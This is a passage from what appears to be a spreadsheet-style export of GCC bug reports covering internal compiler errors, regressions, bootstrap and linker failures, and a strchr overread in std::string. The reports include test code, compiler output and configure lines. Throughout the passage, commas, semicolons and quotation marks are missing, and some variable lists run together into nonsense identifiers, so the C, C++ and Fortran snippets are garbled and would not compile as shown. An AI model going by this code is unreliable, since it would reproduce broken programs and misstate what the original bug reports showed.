build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/home/stevenj/gcc4
How-To-Repeat:
Compile the following code with 'gcc -O3 -msse -o bug2 bug2.c'
typedef float V __attribute__ ((vector_size (16)))
union fvec {
     float f[4]
     V v
}
typedef unsigned int uintptr_t
#define ALIGNMENT 8
#define TAINT_BIT 1
#define PTRINT(p) ((uintptr_t)(p))
#define ALIGNED(p) \
  (((PTRINT(p) % ALIGNMENT) == 0) &amp;&amp; !(PTRINT(p) &amp; TAINT_BIT))
const union fvec foo = {{-0.0 0.0 -0.0 0.0}}
int main(void)
{
     return !ALIGNED(
}</t>
  </si>
  <si>
    <t>GCC-48632</t>
  </si>
  <si>
    <t>Internal compiler error when using OpenMP with template</t>
  </si>
  <si>
    <t>Created attachment 24004
Source code to reproduce the problem.
Hi
I'm getting a internal compiler error when trying to compile a piece of code that uses OpenMP inside of templated code. I use pointer arithmetic using a template type inside the for loop header. I'm not sure if my code is legal for OpenMP but it should not cause a internal compiler error.
Output of gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/pneveu/apps/gcc-4.5-src/libexec/gcc/x86_64-unknown-linux-gnu/4.5.3/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: src/gcc/configure --with-mpc=/home/pneveu/apps/gcc-4.5-src/prerequisites --with-mpfr=/home/pneveu/apps/gcc-4.5-src/prerequisites --with-gmp=/home/pneveu/apps/gcc-4.5-src/prerequisites --with-ppl=/home/pneveu/apps/gcc-4.5-src/prerequisites --with-cloog=/home/pneveu/apps/gcc-4.5-src/prerequisites --prefix=/home/pneveu/apps/gcc-4.5-src
Thread model: posix
gcc version 4.5.3 20110412 (prerelease) (GCC) 
Command to reproduce the problem:
g++ -fopenmp -c test.cpp
Output of the problem:
test.cpp: In function â€˜void CopyData(TDataType* unsigned int unsigned int TDataType* unsigned int unsigned int unsigned int unsigned int unsigned int)â€™:
test.cpp:25:54: internal compiler error: in build2_stat at tree.c:3680
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Cheers
Phelippe</t>
  </si>
  <si>
    <t>phelippeneveu</t>
  </si>
  <si>
    <t>GCC-2656</t>
  </si>
  <si>
    <t>template instantiation problem with gcc 2.95.2</t>
  </si>
  <si>
    <t>Compiling code below gives the following error. It compiles
ok under 2.91.66 (and other c++ compilers). Also if I
comment out either of the two operator== declaration from
FooBase it compiles fine on 2.95.2. 
foo.C: In instantiation of `FooBase':
foo.C:29:   instantiated from `Foo'
foo.C:29:   instantiated from here
foo.C:10: invalid use of undefined type `class FooBase'
foo.C:12: forward declaration of `class FooBase'
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0smp on a 4-processor i686
How-To-Repeat:
Detach foo.C and compile as follows:
g++ -c foo.C</t>
  </si>
  <si>
    <t>ik.yoo</t>
  </si>
  <si>
    <t>GCC-47744</t>
  </si>
  <si>
    <t>[x32] ICE: in reload_cse_simplify_operands at postreload.c:403</t>
  </si>
  <si>
    <t>On x32 branch I got
[hjl@gnu-6 ilp32-21]$ cat m.i
typedef int int32_t
static const int init_jk[] = {2346}
 int __kernel_rem_pio2(double *x double *y int e0 int nx int prec const int32_t *ipio2)
{
 int32_t jzjxjvjpjkcarryniq[20]ijkmq0ih
 double zfwf[20]fq[20]q[20]
 jk = init_jk[prec]
 jp = jk
 jx = nx-1
 for (i=0i&lt;=jki++) {
     for(j=0fw=0.0j&lt;=jxj++) fw += x[j]*f[jx+i-j] q[i] = fw
 }
 for(i=0j=jzz=q[jz]j&gt;0i++j--) {
     z = q[j-1]+fw
 }
 n = (int32_t) z
 return n
}
[hjl@gnu-6 ilp32-21]$ make m.s
/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-x32/build-x86_64-linux/gcc/ -S -o m.s -mx32 -std=gnu99  -O2 -fPIC    m.i
m.i: In function \u2018__kernel_rem_pio2\u2019:
m.i:18:1: error: insn does not satisfy its constraints:
(insn 108 106 186 3 (set (reg:SI 40 r11 [207])
        (plus:SI (plus:SI (mult:SI (reg:SI 1 dx [205])
                    (const_int 8 [0x8]))
                (subreg:SI (plus:DI (reg/f:DI 7 sp)
                        (const_int 208 [0xd0])) 0))
            (const_int -160 [0xffffffffffffff60]))) m.i:3 251 {*lea_1_x32}
     (nil))
m.i:18:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:403
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [m.s] Error 1
[hjl@gnu-6 ilp32-21]$</t>
  </si>
  <si>
    <t>GCC-47309</t>
  </si>
  <si>
    <t>gcc-4.4.5 fails to build on darwin/ppc due to issues in boehm-gc GC_test_and_set</t>
  </si>
  <si>
    <t>temp work dir replaced with ... for better readability:
libtool: compile:  .../build/./gcc/xgcc -B.../build/./gcc/ -B/opt/local/ppc-apple-darwin9/bin/ -B/opt/local/ppc-apple-darwin9/lib/ -isystem /opt/local/ppc-apple-darwin9/include -isystem /opt/local/ppc-apple-darwin9/sys-include -DHAVE_CONFIG_H -I.../gcc-4.4.5/boehm-gc/include -fexceptions -Iinclude -I././targ-include -I.//libc/include -g -pipe -ggdb3 -fexceptions -Iinclude -I././targ-include -I.//libc/include -c ../../../gcc-4.4.5/boehm-gc/os_dep.c  -fno-common -DPIC -o .libs/os_dep.o
In file included from .../gcc-4.4.5/boehm-gc/include/private/gc_priv.h:98
                 from ../../../gcc-4.4.5/boehm-gc/os_dep.c:17:
.../gcc-4.4.5/boehm-gc/include/private/gc_locks.h: In function 'GC_test_and_set':
.../gcc-4.4.5/boehm-gc/include/private/gc_locks.h:165: error: 'asm' operand has impossible constraints
        inline static int GC_test_and_set(volatile unsigned int *addr) {
          int oldval
          int temp = 1 /* locked value */
          __asm__ __volatile__(
               1:\tlwarx %00%3\n   /* load and reserve               */
               \tcmpwi %0 0\n       /* if load is                     */
               \tbne 2f\n            /*   non-zero return already set */
               \tstwcx. %20%1\n    /* else store conditional         */
               \tbne- 1b\n           /* retry if lost reservation      */
               \tsync\n              /* import barrier                 */
               2:\t\n                /* oldval is zero if we set       */
              : =&amp;r(oldval) =p(addr)
              : r(temp) 1(addr)
              : cr0memory)
          return oldval
        }</t>
  </si>
  <si>
    <t>GCC-58595</t>
  </si>
  <si>
    <t>internal compiler error: in gen_movsi when compiling on arm some files of lttng-tools with -fPIE</t>
  </si>
  <si>
    <t>Created attachment 30947
Preprocessed problematic file main.i
When I try to compile the attached file on arm I get this error messaage:
main.c: In function â€˜thread_manage_kernelâ€™:
main.c:886:1: internal compiler error: in gen_movsi at config/arm/arm.md:5539
 }
I compile with:
gcc -fPIE -O2 -c main.i
if I remove -fPIE it compiles correctly. 
Using gcc 3.8.1 on fedora. 
Target: armv7hl-redhat-linux-gnueabi
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortrangolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-isl=/builddir/build/BUILD/gcc-4.8.1-20130603/obj-armv7hl-redhat-linux-gnueabi/isl-install --with-cloog=/builddir/build/BUILD/gcc-4.8.1-20130603/obj-armv7hl-redhat-linux-gnueabi/cloog-install --disable-sjlj-exceptions --with-cpu=cortex-a8 --with-tune=cortex-a8 --with-arch=armv7-a --with-float=hard --with-fpu=vfpv3-d16 --with-abi=aapcs-linux --build=armv7hl-redhat-linux-gnueabi
Thread model: posix
gcc version 4.8.1 20130603 (Red Hat 4.8.1-1) (GCC) 
I've put some info on the lttng tracker: http://bugs.lttng.org/issues/640
Also reproduced with gcc 4.7.2 (Arch Linux)
 Target: armv6l-unknown-linux-gnueabihf
Configured with: /build/src/gcc-4.7.2/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++fortranltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-libstdcxx-time --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --disable-ppl-version-check --disable-cloog-version-check --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-multilib --disable-libssp --disable-build-with-cxx --disable-build-poststage1-with-cxx --enable-checking=release --host=armv6l-unknown-linux-gnueabihf --build=armv6l-unknown-linux-gnueabihf --with-arch=armv6 --with-float=hard --with-fpu=vfp
Thread model: posix</t>
  </si>
  <si>
    <t>yannick.brosseau</t>
  </si>
  <si>
    <t>GCC-12313</t>
  </si>
  <si>
    <t>[tree-ssa] Bootstrap failure due to missing label</t>
  </si>
  <si>
    <t>Bootstrap fails on ia64 because there is no definition of dummy from 
uw_update_reg_address in the assembler output. 
/tmp/cvs/gcc-20030917/Build/gcc/xgcc -B/tmp/cvs/gcc-20030917/Build/gcc/ -B/usr/
local/ia64-suse-linux/bin/ -B/usr/local/ia64-suse-linux/lib/ -isystem /usr/
local/ia64-suse-linux/include -isystem /usr/local/ia64-suse-linux/sys-include 
-O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes 
-Wmissing-prototypes -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT 
-DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -shared -nodefaultlibs 
-Wl--soname=libgcc_s.so.1 -Wl--version-script=libgcc/./libgcc.map -o 
libgcc_s.so.1   libgcc/./__divtf3.o libgcc/./__divdf3.o libgcc/./__divsf3.o 
libgcc/./__divdi3.o libgcc/./__moddi3.o libgcc/./__udivdi3.o libgcc/./
__umoddi3.o libgcc/./__divsi3.o libgcc/./__modsi3.o libgcc/./__udivsi3.o 
libgcc/./__umodsi3.o libgcc/./__save_stack_nonlocal.o libgcc/./
__nonlocal_goto.o libgcc/./__restore_stack_nonlocal.o libgcc/./__trampoline.o 
libgcc/./_muldi3.o libgcc/./_negdi2.o libgcc/./_lshrdi3.o libgcc/./_ashldi3.o 
libgcc/./_ashrdi3.o libgcc/./_cmpdi2.o libgcc/./_ucmpdi2.o libgcc/./
_floatdidf.o libgcc/./_floatdisf.o libgcc/./_fixunsdfsi.o libgcc/./
_fixunssfsi.o libgcc/./_fixunsdfdi.o libgcc/./_fixdfdi.o libgcc/./_fixunssfdi.o 
libgcc/./_fixsfdi.o libgcc/./_fixxfdi.o libgcc/./_fixunsxfdi.o libgcc/./
_floatdixf.o libgcc/./_fixunsxfsi.o libgcc/./_fixtfdi.o libgcc/./_fixunstfdi.o 
libgcc/./_floatditf.o libgcc/./_clear_cache.o libgcc/./_trampoline.o libgcc/./
__main.o libgcc/./_absvsi2.o libgcc/./_absvdi2.o libgcc/./_addvsi3.o libgcc/./
_addvdi3.o libgcc/./_subvsi3.o libgcc/./_subvdi3.o libgcc/./_mulvsi3.o 
libgcc/./_mulvdi3.o libgcc/./_negvsi2.o libgcc/./_negvdi2.o libgcc/./_ctors.o 
libgcc/./_ffssi2.o libgcc/./_ffsdi2.o libgcc/./_clz.o libgcc/./_clzsi2.o 
libgcc/./_clzdi2.o libgcc/./_ctzsi2.o libgcc/./_ctzdi2.o libgcc/./
_popcount_tab.o libgcc/./_popcountsi2.o libgcc/./_popcountdi2.o libgcc/./
_paritysi2.o libgcc/./_paritydi2.o libgcc/./_divdi3.o libgcc/./_moddi3.o 
libgcc/./_udivdi3.o libgcc/./_umoddi3.o libgcc/./_udiv_w_sdiv.o libgcc/./
_udivmoddi4.o  libgcc/./unwind-ia64.o libgcc/./unwind-sjlj.o libgcc/./
unwind-c.o libgcc/./fde-glibc.o -lc &amp;&amp; rm -f libgcc_s.so &amp;&amp; ln -s libgcc_s.so.1 
libgcc_s.so 
/usr/bin/ld: libgcc/./unwind-ia64.o: @gprel relocation against dynamic symbol 
dummy.1 
collect2: ld returned 1 exit status 
make[3]: *** [libgcc_s.so] Error 1 
make[3]: Leaving directory `/tmp/cvs/gcc-20030917/Build/gcc'</t>
  </si>
  <si>
    <t>GCC-59962</t>
  </si>
  <si>
    <t>--with-build-config=bootstrap-asan doesn't work</t>
  </si>
  <si>
    <t>When GCC is configured with --with-build-config=bootstrap-asan
bootstrap fails with
/export/build/gnu/gcc-asan/build-x86_64-linux/./gcc/xgcc -B/export/build/gnu/gcc-asan/build-x86_64-linux/./gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -g -O2 -static-libstdc++ -static-libgcc  -o fixincl fixincl.o fixtests.o fixfixes.o server.o procopen.o fixlib.o fixopts.o ../libiberty/libiberty.a
../libiberty/libiberty.a(regex.o): In function `byte_compile_range':
/export/gnu/import/git/gcc/libiberty/regex.c:4495: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4449: undefined reference to `__asan_report_load8'
/export/gnu/import/git/gcc/libiberty/regex.c:4499: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4499: undefined reference to `__asan_report_store1'
/export/gnu/import/git/gcc/libiberty/regex.c:4499: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4499: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4495: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4495: undefined reference to `__asan_report_load1'
/export/gnu/import/git/gcc/libiberty/regex.c:4489: undefined reference to `__asan_report_load1'
../libiberty/libiberty.a(regex.o): In function `byte_common_op_match_null_string_p':
...
fixincl isn't compiled/linked with -fsanitize=address but libiberty
it linked against is.  A patch is posted at
http://gcc.gnu.org/ml/gcc-patches/2012-11/msg02467.html</t>
  </si>
  <si>
    <t>GCC-68475</t>
  </si>
  <si>
    <t>[4.9/5/6 Regression] ICE: in merge_exception_specifiers at cp/typeck2.c:2115 with -fno-exceptions on invalid code</t>
  </si>
  <si>
    <t>Created attachment 36801
reduced testcase (from g++.dg/cpp0x/noexcept28.C)
Compiler output:
$ gcc testcase.C -fno-exceptions
testcase.C:10:58: internal compiler error: in merge_exception_specifiers at cp/typeck2.c:2115
 X ::operator = (X &amp;&amp;) noexcept (traits ::bar ())
                                                          ^
0x6990cb merge_exception_specifiers(tree_node* tree_node*)
        /mnt/svn/gcc-trunk/gcc/cp/typeck2.c:2113
0x73a271 merge_types(tree_node* tree_node*)
        /mnt/svn/gcc-trunk/gcc/cp/typeck.c:882
0x60d8a8 duplicate_decls(tree_node* tree_node* bool)
        /mnt/svn/gcc-trunk/gcc/cp/decl.c:2035
0x5a9095 grokfndecl
        /mnt/svn/gcc-trunk/gcc/cp/decl.c:8222
0x626323 grokdeclarator(cp_declarator const* cp_decl_specifier_seq* decl_context int tree_node**)
        /mnt/svn/gcc-trunk/gcc/cp/decl.c:11299
0x628c86 start_function(cp_decl_specifier_seq* cp_declarator const* tree_node*)
        /mnt/svn/gcc-trunk/gcc/cp/decl.c:14085
0x71d978 cp_parser_function_definition_from_specifiers_and_declarator
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:24703
0x71d978 cp_parser_init_declarator
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:17972
0x71f394 cp_parser_single_declaration
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:25278
0x71f53b cp_parser_template_declaration_after_parameters
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:24897
0x7200e4 cp_parser_explicit_template_declaration
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:25132
0x7200e4 cp_parser_template_declaration_after_export
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:25150
0x728ec1 cp_parser_declaration
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:11708
0x7271ea cp_parser_declaration_seq_opt
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:11630
0x727538 cp_parser_translation_unit
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:4189
0x727538 c_parse_file()
        /mnt/svn/gcc-trunk/gcc/cp/parser.c:36803
0x881492 c_common_parse_file()
        /mnt/svn/gcc-trunk/gcc/c-family/c-opts.c:1064
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                        
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-230703-lto-fortran-checking-yes-rtl-df/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk//binary-230703-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl --without-isl
Thread model: posix
gcc version 6.0.0 20151121 (experimental) (GCC) 
Tested revisions:
r230703 - ICE</t>
  </si>
  <si>
    <t>GCC-8057</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] Templates/non-templates and warnings about statements without effects</t>
  </si>
  <si>
    <t>In the following snippet
------------------------------
struct Y { static int i }
template  class X {
    X () { Y::i }
}
template class X
class Z {
    Z () { Y::i }
}
--------------------------------
both the constructors of X and Z access Y::i in a statement
without effect. This is the error message displayed with
gcc3.2:
--------------------------------
&gt; &gt;  /home/bangerth/bin/gcc-3.2/bin/g++ -o /dev/null -W -Wall -c y.cc
y.cc: In constructor `X::X() [with T = int]':
y.cc:4:   instantiated from `X::X() [with T = int]'
y.cc:6:   instantiated from here
y.cc:4: warning: statement with no effect
y.cc: In constructor `X::X() [with T = int]':
y.cc:4: warning: statement with no effect
----------------------------------------------
In other words: the compiler warns twice about that 
statement in the template class but not at all in the
non-template. This is well confusing.
Regards
  Wolfgang
Release:
unknown
Environment:
gcc 3.2</t>
  </si>
  <si>
    <t>GCC-40992</t>
  </si>
  <si>
    <t>[4.4 Regression] cunroll ignoring asm size</t>
  </si>
  <si>
    <t>The attached file is a loop over the same function implemented in C and inline asm. 
When compiled with:
gcc -O3 -fno-pic -fomit-frame-pointer -fdump-tree-cunroll-details -S cabac_unroll.i
cunroll thinks they're different sizes:
size: 55-4 last_iteration: 55-4
  Loop size: 55
  Estimated size after unrolling: 442
size: 8-4 last_iteration: 8-4
  Loop size: 8
  Estimated size after unrolling: 34
and expands the asm loop all 13 times.
This is reduced from ffmpeg decode_cabac_residual where it apparently causes significant decoding slowdown.
Besides that cunroll seems to be hurting ffmpeg in general on x86-32 (http://multimedia.cx/eggs/last-performance-smackdown-for-awhile/) maybe we'll turn it down some.</t>
  </si>
  <si>
    <t>GCC-1741</t>
  </si>
  <si>
    <t>GCC make failing with Internal compiler error in 'dump_and_abort'</t>
  </si>
  <si>
    <t>While trying to remake GCC with the new libstdc++ the make fails with:
./genattr /c/cygwin/gcc-2.95.2-6/gcc/config/i386/i386.md &gt; tmp-attr.h
.  At file position: 155ound character
I do not suspect this is related to the new libstdc++ since it hasn't gotten to the point to compile it yet.
Release:
gcc version 2.95.2-6 19991024 (cygwin experimental)
Environment:
Cygwin Win2000 PentiumIII
How-To-Repeat:
Install Cygwin (version containing 1.1.7 of the dll latest version as of 20010123) with all sources
Get libstdc++-2.91 extract into gcc-2.95.2-6 dir of the cygwin install
mv libio libio-v2
mv libstdc++ libstdc++-v2
ln -s libstdc++-2.91 libstdc++
mkdir /c/temp/object
mkdir /c/temp/output
cd /c/temp/object
/c/cygwin/gcc-2.95.2-6/configure --prefix /c/temp/output
make bootstrap (or make all or make libstdc++)</t>
  </si>
  <si>
    <t>GCC-37844</t>
  </si>
  <si>
    <t>-floop-interchange leads to an ICE</t>
  </si>
  <si>
    <t>$gcc --version
gcc (GCC) 4.4.0 20081015 (experimental)
$gcc -c -O3  -floop-interchange cp-demangle.c
/svn/gcc/libiberty/cp-demangle.c: In function 'd_find_pack':
/svn/gcc/libiberty/cp-demangle.c:3164: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-1066</t>
  </si>
  <si>
    <t>bad use of strchr() in std::string</t>
  </si>
  <si>
    <t>in src/string-inst.cc:
#if _GLIBCPP_INSTANTIATING_CHAR
  template
    const char* 
    string::_S_find(const char* __beg const char* __end char __c)
    { 
      char* __retval = strchr(__beg __c) 
      return (__retval ? __retval : __end)
    }
#else
...
The problem here is that strchr() is expecting the
char array to end with a 0 byte.  This doesn't necessarily
happen in std::string.  So strchr() could end up
accessing memory past the end of the array.  This makes
efence very angry  :^)
Release:
head of line
Environment:
#if _GLIBCPP_INSTANTIATING_CHAR</t>
  </si>
  <si>
    <t>bgarcia</t>
  </si>
  <si>
    <t>GCC-65256</t>
  </si>
  <si>
    <t>[5 regression] Undefined symbols linking f951</t>
  </si>
  <si>
    <t>In stage2:
/test/gnu/gcc/objdir/./prev-gcc/xg++ -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/gnu/gcc/gcc-5.0/hppa2.0w-hp-hpux11.11/bin/ -nostdinc++ -B/test/gnu/gcc/objdir/pre
v-hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -B/test/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.11/libstdc++-v3/libsupc++/.libs  -I/test/gnu/gcc/objdir/prev-hppa2
.0w-hp-hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hpux11.11  -I/test/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.11/libstdc++-v3/include  -I/test/gnu/gcc/gcc/libstdc
++-v3/libsupc++ -L/test/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -L/test/gnu/gcc/objdir/prev-hppa2.0w-hp-hpux11.11/libstdc++-v3/libsupc+
+/.libs   -g -O2 -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribu
te -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overl
ength-strings -Werror -fno-common  -DHAVE_CONFIG_H -static-libstdc++ -static-lib
gcc  -o f951 \
                fortran/arith.o fortran/array.o fortran/bbt.o fortran/check.o fo
rtran/class.o fortran/constructor.o fortran/cpp.o fortran/data.o fortran/decl.o 
fortran/dump-parse-tree.o fortran/error.o fortran/expr.o fortran/interface.o for
tran/intrinsic.o fortran/io.o fortran/iresolve.o fortran/match.o fortran/matchex
p.o fortran/misc.o fortran/module.o fortran/openmp.o fortran/options.o fortran/p
arse.o fortran/primary.o fortran/resolve.o fortran/scanner.o fortran/simplify.o 
fortran/st.o fortran/symbol.o fortran/target-memory.o  fortran/convert.o fortran
/dependency.o fortran/f95-lang.o fortran/trans.o fortran/trans-array.o fortran/t
rans-common.o fortran/trans-const.o fortran/trans-decl.o fortran/trans-expr.o fortran/trans-intrinsic.o fortran/trans-io.o fortran/trans-openmp.o fortran/trans-stmt.o fortran/trans-types.o fortran/frontend-passes.o libbackend.a main.o tree-browser.o libcommon-target.a libcommon.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a -L../zlib -lz libcommon.a ../libcpp/libcpp.a   ../libbacktrace/.libs/libbacktrace.a ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a  attribs.o \
                 -L/opt/gnu/gcc/gmp/lib -lmpc -lmpfr -lgmp   -L../zlib -lz
/usr/ccs/bin/ld: Unsatisfied symbols:
   (anonymous namespace)::pass_dce::gate(function*) (first referenced in libbackend.a(tree-ssa-dce.o)) (data)
   (anonymous namespace)::pass_diagnose_tm_blocks::gate(function*) (first referenced in libbackend.a(trans-mem.o)) (data)
   (anonymous namespace)::pass_refactor_eh::gate(function*) (first referenced in libbackend.a(tree-eh.o)) (data)
   (anonymous namespace)::pass_build_alias::gate(function*) (first referenced in libbackend.a(tree-ssa-structalias.o)) (data)
   (anonymous namespace)::pass_ira::gate(function*) (first referenced in libbackend.a(ira.o)) (data)
   (anonymous namespace)::pass_lower_tm::gate(function*) (first referenced in libbackend.a(trans-mem.o)) (data)
   (anonymous namespace)::pass_lower_subreg::gate(function*) (first referenced in libbackend.a(lower-subreg.o)) (data)
   (anonymous namespace)::pass_optimize_bswap::gate(function*) (first referenced in libbackend.a(tree-ssa-math-opts.o)) (data)
   (anonymous namespace)::pass_rtl_fwprop::gate(function*) (first referenced in libbackend.a(fwprop.o)) (data)
   (anonymous namespace)::pass_dominator::gate(function*) (first referenced in libbackend.a(tree-ssa-dom.o)) (data)
/usr/ccs/bin/ld: Invalid symbol type for plabel (libbackend.a(trans-mem.o) (anonymous namespace)::pass_diagnose_tm_blocks::gate(function*)).
collect2: error: ld returned 1 exit status
make[3]: *** [f951] Error 1
make[3]: *** Waiting for unfinished jobs....
rm gfortran.pod gcov.pod cpp.pod gfdl.pod gcov-tool.pod fsf-funding.pod gcc.pod
make[3]: Leaving directory `/test/gnu/gcc/objdir/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/test/gnu/gcc/objdir'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/test/gnu/gcc/objdir'
make: *** [bootstrap] Error 2
Wed Feb 25 22:27:01 EST 2015
r220778 was okay.</t>
  </si>
  <si>
    <t>GCC-78881</t>
  </si>
  <si>
    <t>[F03] reading from string with DTIO procedure does not work properly</t>
  </si>
  <si>
    <t>From https://software.intel.com/en-us/forums/intel-visual-fortran-compiler-for-windows/topic/706063:
module t_m
   use intrinsic :: iso_fortran_env only : iostat_end iostat_eor output_unit
   implicit none
   private
   type public :: t
      private
      character(len=:) allocatable :: m_s
   contains
      !private
      procedure pass(this) private :: read_t
      generic :: read(formatted) =&gt; read_t
   end type t
contains
    subroutine read_t(this lun iotype vlist istat imsg)
      ! argument definitions
      class(t) intent(inout)         :: this
      integer intent(in)             :: lun
      character(len=*) intent(in)    :: iotype
      integer intent(in)             :: vlist(:)
      integer intent(out)            :: istat
      character(len=*) intent(inout) :: imsg
      !.. Local variables
      character(len=*) parameter :: sfmt = (*(g0))
      character(len=1) :: c
      integer :: i
      i = 0
      loop_read: do
         i = i + 1
         read( unit=lun fmt=(a) iostat=istat iomsg=imsg ) c
         select case ( istat )
            case ( 0 )
               write( output_unit fmt=sfmt) i =  i  c =  c
            case ( iostat_end )
               write( output_unit fmt=sfmt) i =  i  istat = iostat_end
               exit loop_read
            case ( iostat_eor )
               write( output_unit fmt=sfmt) i =  i  istat = iostat_eor
               exit loop_read
            case default
               write( output_unit fmt=sfmt) i =  i  istat =  istat
               exit loop_read
         end select
      end do loop_read
      return
   end subroutine read_t
end module t_m
program p
   use t_m only : t
   implicit none
   character(len=:) allocatable :: s
   type(t) :: foo
   character(len=256) :: imsg
   integer :: istat
   s = Hello
   read( unit=s fmt=* iostat=istat iomsg=imsg ) foo
   if ( istat /= 0 ) then
      print * istat =  istat
      print * imsg
   end if
   stop
end program p
After compiling this with current trunk the runtime output is:
i = 1 c = e
i = 2 c = l
i = 3 c = l
i = 4 c = o
i = 5 istat = iostat_end
 istat =           -1
 End of file
It seems like the first character is being swallowed somewhere ...</t>
  </si>
  <si>
    <t>GCC-7335</t>
  </si>
  <si>
    <t>Sparc: ICE in verify_wide_reg (flow.c:557) with long double and optimization</t>
  </si>
  <si>
    <t>gcc ICEs upon the following (simple common) code when compiling with -O1 on sparc machines:
-------------------------------------------------
double* copy(long double* first long double* last double* result)
{
  int n
  for (n = last - first n &gt; 0 --n) {
    *result = *first
    ++first
    ++result
  }
  return result
}
void f()
{
  long double *p1 *p2
  double *p3
  copy (p1 p2 p3)
  p3 = copy (p1 p2 p3)
}
----------------------------------------------------
deal.II/base&gt; ~/bin/sparc-sun-solaris2.9/bin/gcc -v
Reading specs from /home/atlas2/wolf/bin/sparc-sun-solaris2.9/bin/../lib/gcc-lib/sparc-sun-solaris2.9/3.1.1/specs
Configured with: ../gcc-20020624/configure --prefix=/home/people/wolf/bin/sparc-sun-solaris2.9 --enable-languages=cc++
Thread model: posix
gcc version 3.1.1 20020624 (prerelease)
deal.II/base&gt; ~/bin/sparc-sun-solaris2.9/bin/gcc -O1 -c t.c
t.c: In function `copy':
t.c:10: Internal compiler error in verify_wide_reg at flow.c:557
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
gcc3.1 gcc3.1.1 pre of 20020624
Environment:
sparc-sun-solaris2.8/9</t>
  </si>
  <si>
    <t>wolfgang.bangerth</t>
  </si>
  <si>
    <t>GCC-20835</t>
  </si>
  <si>
    <t>error needed with EQUIVALENCE and TARGET</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
  REAL :: A
  REAL TARGET :: B
  EQUIVALENCE(AB)
END</t>
  </si>
  <si>
    <t>GCC-34496</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] prefixed notation allows changing the value of a constant</t>
  </si>
  <si>
    <t>with text_io
procedure test1 is
   package pak3 is
      type T1 is tagged record
